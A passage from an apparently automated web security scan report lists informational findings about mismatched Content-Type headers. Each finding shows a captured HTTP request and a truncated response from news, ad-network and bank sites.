HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:36:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 11 Jul 2005 17:48:02 GMT
Content-Length: 318
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR DEV PSA PSD CONo TELo ADM TAI OUR LEG PHY ONL UNI FIN CNT PRE GOV PUR NAV INT COM STA"
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/plain
Content-Language: en-US

..............(.......(....... ..............................................................................................."""""""""""""""""""""""""".(..."""./....""./."..""./."/.""./."/.""./."/.""
...[SNIP]...

13.3. http://events.nydailynews.com/partner_json/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=4&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=24%2C17%2C19%2C5%2C6%2C32%2C1325%2C80%2C35%2C1725%2C42%2C9&radius=200&where=New+York%2C+NY&tag=&when=next+30+Days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 27 Sep 2011 13:20:57 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: fresh
X-HTTP_CLIENT_IP_O: 12.149.8.201
ETag: "5fc05b12217bdffef604265b335696e9"
X-Runtime: 814
Access-Control-Allow-Origin: *
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: e8ccea71c062378073a7d10bd6ce603adb6ebfca
Cache-Control: max-age=1800, public
Z-REQUEST-HANDLED-BY: www2
Age: 38
Content-Length: 3422

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Oktoberfest at Pullcart","has_tickets":true,"tickets_on_sale":null,"venue_id":1088369,"id":211974285,"images":[{"url":"http://www.zv
...[SNIP]...

13.4. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:21:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1317129670_1317129669033:1134794656352757; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 27 Sep 2011 13:21:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 730

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCAB
...[SNIP]...

13.5. http://pglb.buzzfed.com/36696/3257d75f8c2757d32e8a0463830be2e6  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /36696/3257d75f8c2757d32e8a0463830be2e6

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /36696/3257d75f8c2757d32e8a0463830be2e6?callback=BF_PARTNER.gate_response&cb=1020 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=581240
Expires: Tue, 04 Oct 2011 06:51:04 GMT
Date: Tue, 27 Sep 2011 13:23:44 GMT
Connection: close

BF_PARTNER.gate_response(1317100000);

13.6. http://pglb.buzzfed.com/36696/fedb6e8b45a69fe2d76a00bd07b06405  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /36696/fedb6e8b45a69fe2d76a00bd07b06405

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /36696/fedb6e8b45a69fe2d76a00bd07b06405?callback=BF_PARTNER.gate_response&cb=3250 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=576110
Expires: Tue, 04 Oct 2011 05:24:56 GMT
Date: Tue, 27 Sep 2011 13:23:06 GMT
Connection: close

BF_PARTNER.gate_response(1317099981);

13.7. http://wd.sharethis.com/api/getCount2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __stid=CqIZrE48YIeMTxMbAzqQAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 26 Sep 2011 20:38:28 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 175

(function(){stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.computerworld.com\/s\/article\/9220295\/MySQL.com_hacked_to_serve_malware"})})();

13.8. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/cadre_haut_back_gau.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/cadre_haut_back_gau.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/cadre_haut_back_gau.png HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:46 GMT
Content-length: 861
Content-type: image/png
Last-modified: Thu, 16 Sep 2010 18:58:28 GMT
Etag: "35d-4c9268d4"
Accept-ranges: bytes

GIF87a..................................................................................................................................................................................................
...[SNIP]...

13.9. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_bas_back.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_bas_back.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_bas_back.png HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:46 GMT
Content-length: 816
Content-type: image/png
Last-modified: Thu, 16 Sep 2010 18:58:28 GMT
Etag: "330-4c9268d4"
Accept-ranges: bytes

GIF87a..................................................................................................................................................................................................
...[SNIP]...

13.10. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_bas_dr.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_bas_dr.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_bas_dr.png HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:48 GMT
Content-length: 862
Content-type: image/png
Last-modified: Thu, 16 Sep 2010 18:58:28 GMT
Etag: "35e-4c9268d4"
Accept-ranges: bytes

GIF87a..................................................................................................................................................................................................
...[SNIP]...

13.11. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_bas_gau.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_bas_gau.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_bas_gau.png HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:46 GMT
Content-length: 861
Content-type: image/png
Last-modified: Thu, 16 Sep 2010 18:58:28 GMT
Etag: "35d-4c9268d4"
Accept-ranges: bytes

GIF87a..................................................................................................................................................................................................
...[SNIP]...

13.12. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_haut_dr.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_haut_dr.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_haut_dr.png HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:43 GMT
Content-length: 860
Content-type: image/png
Last-modified: Thu, 16 Sep 2010 18:58:28 GMT
Etag: "35c-4c9268d4"
Accept-ranges: bytes

GIF87a..................................................................................................................................................................................................
...[SNIP]...

13.13. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_haut_gau.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_haut_gau.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_haut_gau.png HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:43 GMT
Content-length: 858
Content-type: image/png
Last-modified: Thu, 16 Sep 2010 18:58:28 GMT
Etag: "35a-4c9268d4"
Accept-ranges: bytes

GIF87a..................................................................................................................................................................................................
...[SNIP]...

13.14. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_haut_back.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_haut_back.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_haut_back.png HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:43 GMT
Content-length: 822
Content-type: image/png
Last-modified: Thu, 16 Sep 2010 18:58:28 GMT
Etag: "336-4c9268d4"
Accept-ranges: bytes

GIF87a..(...............................................................................................................................................................................................
...[SNIP]...

13.15. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_haut_back_dr.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_haut_back_dr.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_haut_back_dr.png HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:46 GMT
Content-length: 118
Content-type: image/png
Last-modified: Thu, 16 Sep 2010 18:58:28 GMT
Etag: "76-4c9268d4"
Accept-ranges: bytes

GIF87a.......................................................,..........+..I.6k...^...HV...%{.(L.,..'N.!..".J..n....;

13.16. https://www.nbc.ca/bnc/files/bnc10025/en/2/platinumbusiness_en.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.nbc.ca
Path:   /bnc/files/bnc10025/en/2/platinumbusiness_en.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /bnc/files/bnc10025/en/2/platinumbusiness_en.gif HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=creditCardComparison&cAliasDispatcher=creditCardComparisonError&action=1901&lang=en&firstCardId=81903&firstCheckBoxName=cardId_81903&cardID_81903=on&secondCardId=81801&secondCheckBoxName=cardId_81801&cardID_81801=on&numberOfCheckedCard=2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:29 GMT
Content-length: 4884
Content-type: image/gif
Last-modified: Tue, 31 May 2011 17:23:25 GMT
Etag: "1314-4de5240d"
Accept-ranges: bytes

......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

13.17. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

POST /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Content-Length: 209
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: text/plain
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698

callCount=1
page=/index.html
httpSessionId=
scriptSessionId=3051AE2B8D71AA44AF807982E5BE96C8637
c0-scriptName=mostPopularStories
c0-methodName=getMostPopularStoriesLists
c0-id=0
c0-param0=string:%2F
b
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:25:47 GMT
Vary: Accept-encoding
Content-Length: 2281

//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="8 stolen siblings found safe in PA";s0.url="http://www.nydai
...[SNIP]...

13.18. http://www.nydailynews.com/nydn/dwr/interface/mostEmailedStories.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/interface/mostEmailedStories.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /nydn/dwr/interface/mostEmailedStories.js HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:28:14 GMT
Age: 290
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-nydnapp-8080=CAADAKAK; Expires=Tue, 27-Sep-2011 02:11:47 GMT; Path=/
Content-Length: 496


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

dwr.engine._defaultPath = '/nydn/dw
...[SNIP]...

13.19. http://www.nydailynews.com/nydn/dwr/interface/mostPopularStories.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/interface/mostPopularStories.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /nydn/dwr/interface/mostPopularStories.js HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:29:13 GMT
Age: 31
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-nydnapp-8080=BPADAKAK; Expires=Tue, 27-Sep-2011 02:16:06 GMT; Path=/
Content-Length: 496


// Provide a default path to dwr.engine
